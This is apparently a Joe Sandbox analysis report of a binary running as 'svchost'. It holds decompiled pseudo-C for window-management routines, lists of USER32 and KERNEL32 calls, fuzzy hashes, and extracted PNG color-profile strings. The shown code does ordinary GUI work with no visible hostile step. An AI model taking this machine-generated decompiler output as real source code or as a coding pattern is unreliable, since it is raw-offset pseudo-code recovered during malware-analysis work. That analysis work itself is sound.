    																			E00487621( *_t495, ( ~( *((intOrPtr*)(_t639 + _t710)) - 1) & 0xfffffff8) + 8);
    																			_t639 =  &(_t639->i);
    																			_t495 = _t495 + 4;
    																			__eflags = _t639 - _t682;
    																		} while (_t639 < _t682);
    																		_t709 = 0;
    																		__eflags = 0;
    																	}
    																	_t311 =  *( *(_t719 + 0x18) + 0x1dc);
    																	__eflags = _t311 - _t709;
    																	if(_t311 != _t709) {
    																		DestroyAcceleratorTable(_t311);
    																	}
    																	 *( *(_t719 + 0x18) + 0x1dc) =  *(_t719 + 0x28);
    																	E00418A40(0x7da, _t709, _t709);
    																	_t640 = E00413600( *(_t719 + 0x18), _t709);
    																	_t683 =  *((intOrPtr*)(_t719 + 0x4c));
    																	 *((intOrPtr*)(_t719 + 0xc4)) = _t683;
    																	 *((intOrPtr*)(_t719 + 0xc8)) = _t640;
    																	 *(_t719 + 0xcc) = _t709;
    																	 *(_t719 + 0xd0) = _t709;
    																	 *(_t719 + 0xe8) = _t709;
    																	 *(_t719 + 0xec) = _t709;
    																	E00418A40(0x7d8, _t719 + 0xb8, _t709);
    																	_t491 =  *(_t719 + 0x9c);
    																	_t316 = IsWindow(_t491);
    																	__eflags = _t316;
    																	if(_t316 != 0) {
    																		 *((intOrPtr*)(_t719 + 0xc4)) = _t683;
    																		 *((intOrPtr*)(_t719 + 0xc8)) = _t640;
    																		 *(_t719 + 0xcc) = 3;
    																		 *(_t719 + 0xd0) = _t709;
    																		 *(_t719 + 0xe8) = _t709;
    																		 *(_t719 + 0xec) = _t709;
    																		E00418A40(0x7d8, _t719 + 0xb8, _t709);
    																		_t323 = IsWindow(_t491);
    																		__eflags = _t323;
    																		if(_t323 != 0) {
    																			 *((intOrPtr*)(_t719 + 0xc4)) = _t683;
    																			 *((intOrPtr*)(_t719 + 0xc8)) = _t640;
    																			 *(_t719 + 0xcc) = 4;
    																			 *(_t719 + 0xd0) = _t709;
    																			 *(_t719 + 0xe8) = _t709;
    																			 *(_t719 + 0xec) = _t709;
    																			E00418A40(0x7d8, _t719 + 0xb8, _t709);
    																			_t325 = IsWindow(_t491);
    																			__eflags = _t325;
    																			if(_t325 != 0) {
    																				asm("sbb eax, eax");
    																				__eflags =  *( ~( *(_t719 + 0x44)) &  *(_t719 + 0x3c));
    																				if(__eflags != 0) {
    																					_push( *(_t719 + 0xec));
    																					_push( *(_t719 + 0xe8));
    																					_push(_t683);
    																					E00416350(__eflags);
    																				}
    																				_t329 = IsWindow(_t491);
    																				__eflags = _t329;
    																				if(_t329 != 0) {
    																					__eflags =  *((intOrPtr*)(_t719 + 0xf4)) - 1;
    																					if( *((intOrPtr*)(_t719 + 0xf4)) == 1) {
    																						_t687 = 0;
    																						__eflags = 0;
    																						 *( *(_t719 + 0x18) + 0x1bc) = 1;
    																						while(1) {
    																							_t687 =  &(_t687->i);
    																							_t345 = E00413A70( *((intOrPtr*)(_t719 + 0x54)), _t687, _t719 + 0x30);
    																							__eflags = _t345;
    																							if(_t345 == 0) {
    																								goto L131;
    																							}
    																							_t346 =  *(_t719 + 0x30);
    																							__eflags = _t346 -  *(_t719 + 0xe8);
    																							if(_t346 !=  *(_t719 + 0xe8)) {
    																								_t647 = E004135B0(_t346 + 0x14, _t709, _t709) + 0x18;
    																								_t648 = _t647 + E0040C020(_t346 + 0x14, _t647);
    																								_t349 = E0040C020(_t346 + 0x14, _t648);
    																								_t719 = _t719 + 8;
    																								_t650 =  *((intOrPtr*)(_t648 + _t349));
    																								__eflags = _t650 - _t709;
    																								if(_t650 != _t709) {
    																									_t350 = IsWindow( *(_t650 + 0x1c));
    																									__eflags = _t350;
    																									if(_t350 != 0) {
    																										_t353 = E00484C84(_t709, GetParent( *(_t650 + 0x1c)));
    																										__eflags = _t353;
    																										if(_t353 == 0) {
    																											E0040B860( *(_t719 + 0x18) + 0x1c0, _t687,  *(_t650 + 0x1c));
    																											E0040B860( *(_t719 + 0x18) + 0x1c0, _t687, E00487648(_t650));
    																											E00487663(_t650, _t709);
    																										}
    																									}
    																								}
    																							}
    																						}
    																					}
    																				}
    																				L131:
    																				_t685 = GetFocus();
    																				 *(_t719 + 0x50) = _t685;
    																				_t493 =  *((intOrPtr*)( *(_t719 + 0xe8) + 0x18)) - 1;
    																				__eflags = _t493;
    																				if(_t493 >= 0) {
    																					_t686 =  &(_t493->i);
    																					while(1) {
    																						_t336 = _t493;
    																						_t493 = _t493 - 1;
    																						_t686 = _t686 - 1;
    																						_t641 = E004135B0( *(_t719 + 0x14), _t336, _t709);
    																						__eflags = _t641 - _t709;
    																						if(_t641 == _t709) {
    																							break;
    																						}
    																						_t530 =  *(_t719 + 0x14);
    																						_t338 = E00413C90( *(_t719 + 0x14), _t686);
    																						__eflags = _t338;
    																						if(_t338 == 0) {
    																							_t642 = _t641 + 0x18;
    																							_t643 = _t642 + E0040C020(_t530, _t642);
    																							_t340 = E0040C020(_t530, _t643);
    																							_t719 = _t719 + 8;
    																							_t645 =  *((intOrPtr*)(_t643 + _t340));
    																							__eflags = _t645 - _t709;
    																							if(_t645 != _t709) {
    																								_t341 = IsWindow( *(_t645 + 0x1c));
    																								__eflags = _t341;
    																								if(_t341 != 0) {
    																									SendMessageA( *(_t645 + 0x1c), 0x8076, _t709, _t709);
    																								}
    																							}
    																						}
    																						__eflags = _t493 - _t709;
    																						if(_t493 >= _t709) {
    																							continue;
    																						}
    																						break;
    																					}
    																					_t685 =  *(_t719 + 0x50);
    																				}
    																				__eflags = _t685 - _t709;
    																				if(_t685 != _t709) {
    																					_t333 = IsWindow(_t685);
    																					__eflags = _t333;
    																					if(_t333 != 0) {
    																						_t334 = GetFocus();
    																						__eflags = _t334 - _t685;
    																						if(_t334 != _t685) {
    																							SetFocus(_t685);
    																						}
    																					}
    																				}
    																				 *( *(_t719 + 0x18) + 0x1b8) = 1;
    																			}
    																		}
    																	}
    																	 *((intOrPtr*)(_t719 + 0x34)) = 0x495e50;
    																	E0040B7D0(_t719 + 0x34);
    																	 *((intOrPtr*)(_t719 + 0x68)) = 0x495e50;
    																	E0040B7D0(_t719 + 0x68);
    																	 *((intOrPtr*)(_t719 + 0x7c)) = 0x495e50;
    																	E0040B7D0(_t719 + 0x7c);
    																	 *((intOrPtr*)(_t719 + 0x54)) = 0x495e50;
    																	E0040B7D0(_t719 + 0x54);
    																	return 1;
    																	goto L146;
    																} else {
    																	goto L87;
    																}
    															}
    															goto L90;
    															L87:
    															_t497 = _t497 - 1;
    															__eflags = _t497 - 1;
    														} while (_t497 >= 1);
    														goto L88;
    													}
    													L90:
    													_t386 =  &( *(_t719 + 0x10)->i);
    													 *(_t719 + 0x10) = _t386;
    													_t487 = _t386;
    													continue;
    												} else {
    													_t487 =  &(_t487[0]);
    													goto L80;
    												}
    												while(1) {
    													L96:
    													_t488 =  *(_t719 + 0x14);
    													_t681 =  &(_t681->i);
    													_t638 = E004135B0(_t488, _t681, 0);
    													__eflags = _t638;
    													if(_t638 == 0) {
    														goto L101;
    													}
    													_t196 = _t681 - 1; // 0x1
    													_t549 = _t488;
    													_t370 = E00413C90(_t488, _t196);
    													__eflags = _t370 - 1;
    													if(_t370 != 1) {
    														_t197 = _t638 + 0x18; // 0x18
    														_t496 = _t197;
    														_t656 = _t496;
    														_t657 = _t656 + E0040C020(_t549, _t656);
    														_t372 = E0040C020(_t549, _t657);
    														_t550 =  *(_t657 + _t372 + 0x1c);
    														_t201 = _t372 + 0x1c; // 0x34
    														_t658 = _t496;
    														_t203 = _t550 * 4; // 0x38
    														_t711 = _t657 + _t201 + _t203 + 4;
    														_t659 = _t658 + E0040C020( *(_t657 + _t372 + 0x1c), _t658);
    														_t375 = E0040C020( *(_t657 + _t372 + 0x1c), _t659);
    														_t206 = _t659 + 0x14; // 0x14
    														_t660 = _t375 + _t206;
    														_t376 =  *(_t657 + _t201 + _t203 + 4);
    														_t719 = _t719 + 0x10;
    														__eflags = _t376;
    														if(_t376 <= 0) {
    															 *_t660 = 0;
    														} else {
    															_t377 = E004201B0( &(_t711[1]), _t376);
    															_t719 = _t719 + 8;
    															 *_t660 = _t377;
    														}
    													}
    												}
    												goto L101;
    											}
    											_t681 = 0;
    											__eflags = 0;
    											goto L96;
    										}
    									}
    									_t487 = 1;
    									goto L80;
    								} else {
    									while(1) {
    										asm("sbb edi, edi");
    										_t674 =  ~(_t484 - _t678) & _t484;
    										_t715 = E004135B0( *(_t719 + 0x14), _t674, 0);
    										if(_t715 == 0) {
    											goto L42;
    										}
    										_t564 =  *(_t719 + 0x14);
    										if(E00413C90( *(_t719 + 0x14), _t674) != 1) {
    											_t500 = E00418A40(0x3ea,  *_t715, 0);
    											__eflags = _t500;
    											if(_t500 == 0) {
    												L58:
    												_t418 =  *(_t719 + 0x28);
    												__eflags = _t418;
    												if(_t418 != 0) {
    													DestroyAcceleratorTable(_t418);
    												}
    												_t419 =  *(_t719 + 0x10);
    												__eflags = _t419;
    												if(_t419 != 0) {
    													DestroyMenu(_t419);
    												}
    												 *((intOrPtr*)( *( *(_t719 + 0x20)) + 8))();
    												goto L56;
    											} else {
    												_t427 =  *(_t500 + 0x2c);
    												__eflags = _t427;
    												if(_t427 == 0) {
    													goto L58;
    												} else {
    													_t428 = _t427->i(1);
    													__eflags = _t428;
    													 *(_t719 + 0x24) = _t428;
    													if(_t428 == 0) {
    														goto L58;
    													} else {
    														_t41 = _t715 + 0x18; // 0x18
    														_t695 = _t41;
    														_t696 = _t695 + E0040C020(_t564, _t695);
    														_t430 = E0040C020(_t564, _t696);
    														_t720 = _t719 + 8;
    														_t697 = _t696 + _t430;
    														 *((intOrPtr*)(_t720 + 0x50)) = _t697;
    														_t698 = _t697 + 4;
    														 *((intOrPtr*)(_t720 + 0xac)) = E00413CB0( *((intOrPtr*)(_t720 + 0x1c)), __eflags, _t715, _t720 + 0x90);
    														 *((intOrPtr*)(_t720 + 0xb0)) = E00413600( *((intOrPtr*)(_t720 + 0x1c)), _t674);
    														E0040B860(_t720 + 0x68, _t698,  *(_t500 + 0x14) >> 0x00000008 & 0x00000001);
    														 *((intOrPtr*)(_t720 + 0x94)) =  *_t698;
    														_t699 = _t698 + 0x18;
    														 *((intOrPtr*)(_t720 + 0xa4)) =  *((intOrPtr*)(_t698 + 4));
    														 *((intOrPtr*)(_t720 + 0xac)) =  *((intOrPtr*)(_t698 + 0xc));
    														_t575 =  *_t699;
    														 *((intOrPtr*)(_t720 + 0xa0)) =  *((intOrPtr*)(_t698 + 8));
    														_t717 = 0;
    														_t623 =  *((intOrPtr*)(_t699 + 4 + _t575 * 4));
    														_t60 = _t575 * 4; // 0x0
    														_t63 = _t623 + 4; // 0x4
    														_t700 = _t699 + _t60 + 4 + _t63;
    														_t437 = E0040C020(_t575, _t700);
    														_t576 =  *(_t500 + 0x14);
    														_t719 = _t720 + 4;
    														_t438 =  *(_t700 + _t437 + 4);
    														__eflags = _t576 & 0x00000080;
    														 *(_t719 + 0x98) =  *(_t700 + _t437 + 4);
    														if((_t576 & 0x00000080) == 0) {
    															__eflags =  *(_t719 + 0xec);
    															if( *(_t719 + 0xec) == 0) {
    																L29:
    																E0040B8E0(_t500, _t719 + 0x34, _t438 & 0x00000001);
    																__eflags =  *(_t719 + 0x98) & 0x00000002;
    																if(( *(_t719 + 0x98) & 0x00000002) != 0) {
    																	_t717 = 0x8000000;
    																}
    															} else {
    																__eflags = _t674;
    																if(_t674 != 0) {
    																	goto L29;
    																} else {
    																	E0040B8E0(_t500, _t719 + 0x38, 1);
    																}
    															}
    														} else {
    															E0040B8E0(_t500, _t719 + 0x38, 0);
    														}
    														__eflags =  *(_t719 + 0x98) & 0x00000004;
    														if(( *(_t719 + 0x98) & 0x00000004) != 0) {
    															_t717 = _t717 | 0x00010000;
    															__eflags = _t717;
    														}
    														__eflags = _t674;
    														if(_t674 != 0) {
    															_t675 =  *((intOrPtr*)(_t719 + 0xb0));
    															_t501 =  *(_t719 + 0x30);
    															_t444 =  *(_t719 + 0x5c)( *((intOrPtr*)(_t719 + 0xc8)),  *((intOrPtr*)(_t719 + 0xb0)), _t717,  *((intOrPtr*)( *(_t719 + 0x30) + 0x1c)), _t501, 0,  *((intOrPtr*)(_t719 + 0xa8)),  *((intOrPtr*)(_t719 + 0xb4)),  *(_t719 + 0xa0),  *((intOrPtr*)(_t719 + 0xac)),  *((intOrPtr*)(_t719 + 0x4c)),  *((intOrPtr*)(_t719 + 0xb0)), 0, 0);
    															_t502 = _t501 + 0xa;
    															__eflags = _t502;
    															_t702 = _t444;
    															 *(_t719 + 0x2c) = _t502;
    															goto L39;
    														} else {
    															_t503 =  *(_t719 + 0x14);
    															_t675 =  *((intOrPtr*)(_t719 + 0xb8));
    															 *0x4c97b8 =  *((intOrPtr*)(_t719 + 0xf4));
    															_t702 =  *(_t719 + 0x5c)( *((intOrPtr*)(_t719 + 0xc8)),  *((intOrPtr*)(_t719 + 0xac)), _t717,  *((intOrPtr*)(_t719 + 0x110)), 0, _t503,  *((intOrPtr*)(_t719 + 0xa8)),  *((intOrPtr*)(_t719 + 0xb4)),  *((intOrPtr*)(_t719 + 0xa8)),  *((intOrPtr*)(_t719 + 0xac)),  *((intOrPtr*)(_t719 + 0x4c)),  *((intOrPtr*)(_t719 + 0xb8)), _t674, _t674);
    															__eflags = _t702;
    															 *0x4c97b8 = 0;
    															 *(_t719 + 0x18) = _t702;
    															if(_t702 == 0) {
    																L46:
    																_t459 =  *(_t719 + 0x28);
    																__eflags = _t459;
    																if(_t459 != 0) {
    																	DestroyAcceleratorTable(_t459);
    																}
    																__eflags = _t503;
    																if(_t503 != 0) {
    																	DestroyMenu(_t503);
    																}
    																 *((intOrPtr*)( *( *(_t719 + 0x20)) + 8))();
    																goto L56;
    															} else {
    																_t463 =  *(_t702 + 0x1c);
    																__eflags = _t463;
    																 *(_t719 + 0x9c) = _t463;
    																if(_t463 == 0) {
    																	goto L46;
    																} else {
    																	_t464 = IsWindow(_t463);
    																	__eflags = _t464;
    																	if(_t464 == 0) {
    																		goto L46;
    																	} else {
    																		 *(_t719 + 0x10) = 0;
    																		 *(_t702 + 0xd8) =  *(_t719 + 0xec);
    																		L39:
    																		__eflags = _t702;
    																		if(_t702 == 0) {
    																			_t445 =  *(_t719 + 0x28);
    																			__eflags = _t445;
    																			if(_t445 != 0) {
    																				DestroyAcceleratorTable(_t445);
    																			}
    																			_t446 =  *(_t719 + 0x10);
    																			__eflags = _t446;
    																			if(_t446 != 0) {
    																				DestroyMenu(_t446);
    																			}
    																			 *((intOrPtr*)( *( *(_t719 + 0x20)) + 8))();
    																			L56:
    																			 *((intOrPtr*)(_t719 + 0x34)) = 0x495e50;
    																			E0040B7D0(_t719 + 0x34);
    																			 *((intOrPtr*)(_t719 + 0x68)) = 0x495e50;
    																			E0040B7D0(_t719 + 0x68);
    																			 *((intOrPtr*)(_t719 + 0x7c)) = 0x495e50;
    																			E0040B7D0(_t719 + 0x7c);
    																			 *((intOrPtr*)(_t719 + 0x54)) = 0x495e50;
    																			E0040B7D0(_t719 + 0x54);
    																			goto L57;
    																		} else {
    																			 *( *(_t719 + 0x48)) = _t702;
    																			E0040B860(_t719 + 0x58, _t702, _t675);
    																			E0040B860(_t719 + 0x80, _t702, _t702);
    																			_t678 =  *(_t719 + 0x30);
    																			_t454 =  *(_t719 + 0x1c) - 1;
    																			__eflags = _t454;
    																			 *(_t719 + 0x1c) = _t454;
    																			_t484 = _t454;
    																			goto L41;
    																		}
    																	}
    																}
    															}
    														}
    													}
    												}
    											}
    										} else {
    											_t484 = _t484 - 1;
    											 *(_t719 + 0x1c) = _t484;
    											L41:
    											if(_t484 > 0) {
    												continue;
    											} else {
    												goto L42;
    											}
    										}
    										goto L146;
    									}
    									goto L42;
    								}
    							}
    						}
    					} else {
    						_t8 = _t287 + 0x18; // 0x18
    						_t703 = _t8;
    						_t704 = _t703 + E0040C020(_t504, _t703);
    						_t472 = E0040C020(_t504, _t704);
    						_t719 = _t719 + 8;
    						_t706 =  *((intOrPtr*)(_t704 + _t472));
    						if(_t706 == 0 || IsWindow( *(_t706 + 0x1c)) == 0) {
    							L6:
    							_t676 = 0;
    							goto L7;
    						} else {
    							if( *((intOrPtr*)(_t706 + 0x1b4)) == 0) {
    								_t476 = IsIconic( *(_t706 + 0x1c));
    								__eflags = _t476;
    								if(_t476 == 0) {
    									E00484C84(_t707, SetActiveWindow( *(_t706 + 0x1c)));
    									return 1;
    								} else {
    									E00487621(_t706, 9);
    									return 1;
    								}
    							} else {
    								E0041BE00(_t706, 0, 0);
    								goto L6;
    							}
    						}
    					}
    				}
    				L146:
    			}


    APIs
    • IsWindow.USER32(?), ref: 004164D2
    • IsIconic.USER32(?), ref: 0041650A
    • SetActiveWindow.USER32(?), ref: 00416533
    • IsWindow.USER32(?), ref: 0041655D
    • IsWindow.USER32(?), ref: 0041682E
    • DestroyAcceleratorTable.USER32(?), ref: 0041697E
    • DestroyMenu.USER32(?), ref: 00416989
    • DestroyAcceleratorTable.USER32(?), ref: 004169A3
    • DestroyMenu.USER32(?), ref: 004169B2
    • DestroyAcceleratorTable.USER32(?), ref: 00416A12
    • DestroyMenu.USER32(?,000003EA,00000000,00000000,?,?,00000000,?,?,?,000007D9,00000000,00000000), ref: 00416A21
    • SetParent.USER32(?,?), ref: 00416AA3
    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00416BBB
    • IsWindow.USER32(?), ref: 00416CEC
    • SendMessageA.USER32(?,0000806F,00000000,00000000), ref: 00416D01
    • SendMessageA.USER32(?,00008004,00000000,00000000), ref: 00416D1E
    • DestroyAcceleratorTable.USER32(?), ref: 00416D6C
    • IsWindow.USER32(?), ref: 00416DE1
    • IsWindow.USER32(?), ref: 00416E31
    • IsWindow.USER32(?), ref: 00416E81
    • IsWindow.USER32(?), ref: 00416EBE
    • IsWindow.USER32(?), ref: 00416F41
    • GetParent.USER32(?), ref: 00416F4F
    • GetFocus.USER32 ref: 00416F90
      • Part of subcall function 00416350: IsWindow.USER32(?), ref: 004163CB
      • Part of subcall function 00416350: GetFocus.USER32 ref: 004163D5
      • Part of subcall function 00416350: IsChild.USER32(?,00000000), ref: 004163E7
    • IsWindow.USER32(?), ref: 00416FEF
    • SendMessageA.USER32(?,00008076,00000000,00000000), ref: 00417004
    • IsWindow.USER32(00000000), ref: 00417017
    • GetFocus.USER32 ref: 00417021
    • SetFocus.USER32(00000000), ref: 0041702C
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Window$Destroy$AcceleratorFocusTable$MenuMessageSend$Parent$ActiveChildIconic
    • String ID: d$^I
    • API String ID: 3681805233-2005080775
    • Opcode ID: c596810b0babb0a56e46ae2b0aa89afd2dc288bec558ce007c254d458f48989b
    • Instruction ID: a2acabba5accccb16bc631d157fb869babdf0dac69e13d3a178eac24b0571b6e
    • Opcode Fuzzy Hash: c596810b0babb0a56e46ae2b0aa89afd2dc288bec558ce007c254d458f48989b
    • Instruction Fuzzy Hash: E2729E71604301ABC320DF65C880BABB7E9EF84744F15492EF94997341DB78E985CBAA
    Uniqueness

    Uniqueness Score: -1.00%

    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID: BGR$ ZYX$ baL$Gray color space not permitted on RGB PNG$PCS illuminant is not D50$RGB color space not permitted on grayscale PNG$YARG$caps$intent outside defined range$invalid ICC profile color space$invalid embedded Abstract ICC profile$invalid rendering intent$invalid signature$knil$lcmn$length does not match profile$psca$rncs$rtnm$rtrp$tag count too large$tsba$unexpected DeviceLink ICC profile class$unexpected ICC PCS encoding$unexpected NamedColor ICC profile class$unrecognized ICC profile class
    • API String ID: 0-319498373
    • Opcode ID: a780bc4e599b10ba0b852387f01a942c4e697f2af1d0e36c32fd42bb4c40402b
    • Instruction ID: f64abc63492ce31e83bf76fe82787fd709467dddb3a18136b419ee78ffe879d1
    • Opcode Fuzzy Hash: a780bc4e599b10ba0b852387f01a942c4e697f2af1d0e36c32fd42bb4c40402b
    • Instruction Fuzzy Hash: 2E91CED360415017EB1CDE2D9C82AB77B959FC5301F1E84AAFA85CB303D029DA1586BD
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 87%
    			E0041EDD0(void* __ebx, void* __ecx) {
    				int _t25;
    				void _t28;
    				void* _t31;
    				void* _t34;
    				intOrPtr* _t35;
    				struct HINSTANCE__* _t50;
    				intOrPtr* _t51;
    				struct HWND__* _t52;
    				void* _t53;
    				void* _t54;
    
    				_t34 = __ebx;
    				_t53 = __ecx;
    				if(IsIconic( *(__ecx + 0x1c)) != 0 || IsZoomed( *(_t53 + 0x1c)) != 0) {
    					E00487621(_t53, 9);
    				}
    				E00487621(_t53, 3);
    				 *(_t54 + 0x10) =  *(_t53 + 0x1c);
    				_t51 = 0;
    				_t50 = LoadLibraryA("User32.dll");
    				if(_t50 == 0) {
    					L9:
    					SystemParametersInfoA(0x30, 0, _t54 + 0x14, 0);
    					_t51 = _t54 + 0x14;
    					goto L10;
    				} else {
    					_push(_t34);
    					_t35 = GetProcAddress(_t50, "MonitorFromWindow");
    					_t28 = GetProcAddress(_t50, "GetMonitorInfoA");
    					 *(_t54 + 0x14) = _t28;
    					if(_t35 != 0 && _t28 != 0) {
    						_t31 =  *_t35( *(_t54 + 0x10), 2);
    						if(_t31 != 0) {
    							 *((intOrPtr*)(_t54 + 0x28)) = 0x48;
    							 *((intOrPtr*)(_t54 + 0x1c))(_t31, _t54 + 0x28);
    							_t51 = _t54 + 0x3c;
    						}
    					}
    					FreeLibrary(_t50);
    					if(_t51 != 0) {
    						L10:
    						_t23 =  *((intOrPtr*)(_t51 + 4));
    						E004875D2(_t53, 0,  *_t51,  *((intOrPtr*)(_t51 + 4)),  *((intOrPtr*)(_t51 + 8)) -  *_t51,  *((intOrPtr*)(_t51 + 0xc)) - _t23, 4);
    						_t52 =  *(_t54 + 0xc);
    						_t25 = IsWindow(_t52);
    						if(_t25 == 0) {
    							return _t25;
    						}
    						return ShowWindow(_t52, 5);
    					} else {
    						goto L9;
    					}
    				}
    			}

    0x0041edd0
    0x0041edd4
    0x0041ede4
    0x0041edf8
    0x0041edf8
    0x0041ee01
    0x0041ee0e
    0x0041ee12
    0x0041ee1a
    0x0041ee1e
    0x0041ee76
    0x0041ee81
    0x0041ee87
    0x00000000
    0x0041ee20
    0x0041ee20
    0x0041ee33
    0x0041ee35
    0x0041ee3d
    0x0041ee41
    0x0041ee4e
    0x0041ee52
    0x0041ee58
    0x0041ee62
    0x0041ee66
    0x0041ee66
    0x0041ee52
    0x0041ee6b
    0x0041ee74
    0x0041ee8b
    0x0041ee8b
    0x0041eea4
    0x0041eea9
    0x0041eeae
    0x0041eeb6
    0x0041eec7
    0x0041eec7
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0041ee74

    APIs
    • IsIconic.USER32(?), ref: 0041EDDC
    • IsZoomed.USER32(?), ref: 0041EDEA
    • LoadLibraryA.KERNEL32(User32.dll,00000003,00000009), ref: 0041EE14
    • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0041EE27
    • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0041EE35
    • FreeLibrary.KERNEL32(00000000), ref: 0041EE6B
    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0041EE81
    • IsWindow.USER32(?), ref: 0041EEAE
    • ShowWindow.USER32(?,00000005,?,?,?,?,00000004), ref: 0041EEBB
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: AddressLibraryProcWindow$FreeIconicInfoLoadParametersShowSystemZoomed
    • String ID: GetMonitorInfoA$H$MonitorFromWindow$User32.dll
    • API String ID: 447426925-661446951
    • Opcode ID: 9b866950cf4ae0e0ddf9994e125894c7af0ed42c985e42d2cead146e9cf53f92
    • Instruction ID: 6ea14233788b89d44d0799521a3c1587d8e310ad3952d1cf443dee1c1a436cfc
    • Opcode Fuzzy Hash: 9b866950cf4ae0e0ddf9994e125894c7af0ed42c985e42d2cead146e9cf53f92
    • Instruction Fuzzy Hash: D3314175744301AFD7209F66DD49F6B77A8EB94B00F10882EB905A7281DBB8EC058769
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 63%
    			E004181F0(signed int __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
    				char _v8;
    				intOrPtr _v16;
    				void* _v20;
    				signed int _v24;
    				char _v28;
    				char _v32;
    				char _v36;
    				char _v52;
    				char _v72;
    				char _v92;
    				void* _v104;
    				void* __ebp;
    				char _t87;
    				void* _t100;
    				void* _t101;
    				void* _t102;
    				CHAR* _t110;
    				_Unknown_base(*)()* _t111;
    				intOrPtr _t125;
    				void* _t128;
    				void* _t137;
    				void* _t141;
    				void* _t148;
    				intOrPtr* _t149;
    				void* _t156;
    				void* _t159;
    				void* _t160;
    				char* _t165;
    				void* _t166;
    				signed int _t171;
    				unsigned int _t173;
    				signed int _t174;
    				intOrPtr _t180;
    				char _t192;
    				intOrPtr _t210;
    				intOrPtr _t218;
    				void* _t231;
    				intOrPtr* _t233;
    				void* _t237;
    				intOrPtr* _t238;
    				struct HINSTANCE__* _t239;
    				void* _t241;
    				void* _t242;
    				void* _t243;
    				intOrPtr _t244;
    				void* _t245;
    				void* _t249;
    				void* _t250;
    
    				_push(0xffffffff);
    				_push(E0048E740);
    				_push( *[fs:0x0]);
    				 *[fs:0x0] = _t244;
    				_t245 = _t244 - 0x4c;
    				_v24 = __ecx;
    				if( *((intOrPtr*)(__ecx + 0xc4)) == 2) {
    					L31:
    					_t87 = 0;
    					L32:
    					 *[fs:0x0] = _v16;
    					return _t87;
    				}
    				_t165 = _a8;
    				if( *_t165 == 0) {
    					goto L31;
    				}
    				asm("repne scasb");
    				_t171 =  !(__ecx | 0xffffffff) - 1;
    				E00471390(_t171 + 0x00000004 & 0x000000fc, _t171);
    				asm("repne scasb");
    				_t173 =  !(_t171 | 0xffffffff);
    				_t237 = _a4 - _t173;
    				_t174 = _t173 >> 2;
